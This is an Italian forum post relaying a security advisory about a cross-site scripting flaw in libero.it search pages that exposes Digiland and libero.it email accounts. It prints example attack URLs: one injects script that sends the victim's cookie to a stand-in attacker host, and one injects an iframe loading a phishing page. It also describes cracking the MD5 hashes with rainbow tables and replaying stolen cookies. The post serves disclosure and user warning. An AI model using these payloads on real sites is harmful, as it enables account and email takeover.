Utenti Digiland ed account email @libero.it a rischio

ERCOLINO

Membro dello Staff
Amministratore
Registrato
3 Marzo 2003
Messaggi
246.739
Località
Torino
Zone-H ha riscontrato un problema di sicurezza presente sul portale libero.it, in particolare nelle funzionalità di ricerca presenti agli indirizzi http://notizie.libero.it , http://magazine.libero.it , http://sport.libero.it , http://liberoblog.libero.it .

La vulnerabilità rilevata è di tipo Cross-Site Scripting ed affligge in particolar modo gli utenti di Digiland, nota community Italiana con oltre 3 milioni di iscritti.

La gravità della falla è dovuta al fatto che attraverso un attacco cross site scripting è possibile rubare il cookie della vittima e risalire allo username e alla password dell'utente Digiland.

L'accesso a Digiland da parte di un utente può avvenire in due diverse modalità:

- Con username e password propri di Digiland;

- Con username e password dell'account email @libero.it/@inwind.it/@iol.it

Nel primo caso l'impatto della vulnerabilità si traduce nella possibilità per l'attaccante di manipolare il sito dell'utente in hosting su digiland, e di accedere ai blog, forum e chat con le credenziali della vittima.

Nel secondo caso invece, oltre alle azioni sopra citate, è possibile per l'attaccante appropriarsi dell'account email della vittima.

In entrambi i casi il cookie contiene username in chiaro, e l'hash MD5 della password, dal quale attraverso un attacco brute force basato su dizionario è possibile risalire alla password in chiaro.

Una tecnica più efficiente per il crack della password MD5 fa uso dell'algoritmo "faster time-memory trade-off" di Philippe Oechslin' basato sulle così dette rainbow tables; tabelle precompilate delle dimensioni di svariati gigabytes. Tale tecnica permette di effettuare il cracking di una password alfanumerica di 8 caratteri codificata in MD5 in meno di mezz'ora (tempo ovviamente variabile a seconda della macchina).

Tuttavia per l'attaccante non è necessario conoscere la password dell'utente Digiland, infatti l'autenticazione avviene attraverso il cookie stesso che contiene l'hash in MD5. Per cui è sufficiente "importare" nel browser il cookie rubato all'utente per accedere con le sue credenziali a Digiland ed ai servizi offerti. Quest' ultima tecnica non è però attuabile al caso in cui l'attaccante voglia accedere all'account email della vittima; in tale situazione infatti è necessario effettuare il cracking dell'hash MD5 tramite le tecniche sopra menzionate.

Per ottenere il cookie della vittima l'attaccante può servirsi di diversi metodi, il più classico è quella di inviare una email che induce la vittima a cliccare su un link come il seguente:

http://notizie.libero.it/ricerca.ph...ttacker/get_cookie?"+document.cookie</script>

In alternativa l'attaccante può usare gli stessi forum, o i blog che Digiland mette a disposizione dei suoi utenti.

Il Cross-Site Scripting potrebbe essere sfruttato tra le altre cose anche per eseguire attacchi phishing, ad esempio inserendo nella pagina di ricerca un form che induca la vittima di inserire user e password che verrebbero inviati all'attaccante.

Esempio:

http://notizie.libero.it/ricerca.php?searchkey=<iframe src="http://badpenguin.altervista.org/liberomail.html" frameborder="NO"></iframe>

Nota: Il contenuto dell' URL può essere anche opportunamente offuscato.

Il problema è da considerarsi abbastanza serio considerando l'alto numero di potenziali vittime. Abbiamo contattato Libero tramite emai il 2 Gennaio 2006 senza ricevere al momento nessuna risposta da parte loro.

In attesa che la vulnerabilità sia corretta, consigliamo agli utenti di Digiland di effettuare sempre il logout prima di visitare siti non fidati.

Fonte
 
Indietro
Alto Basso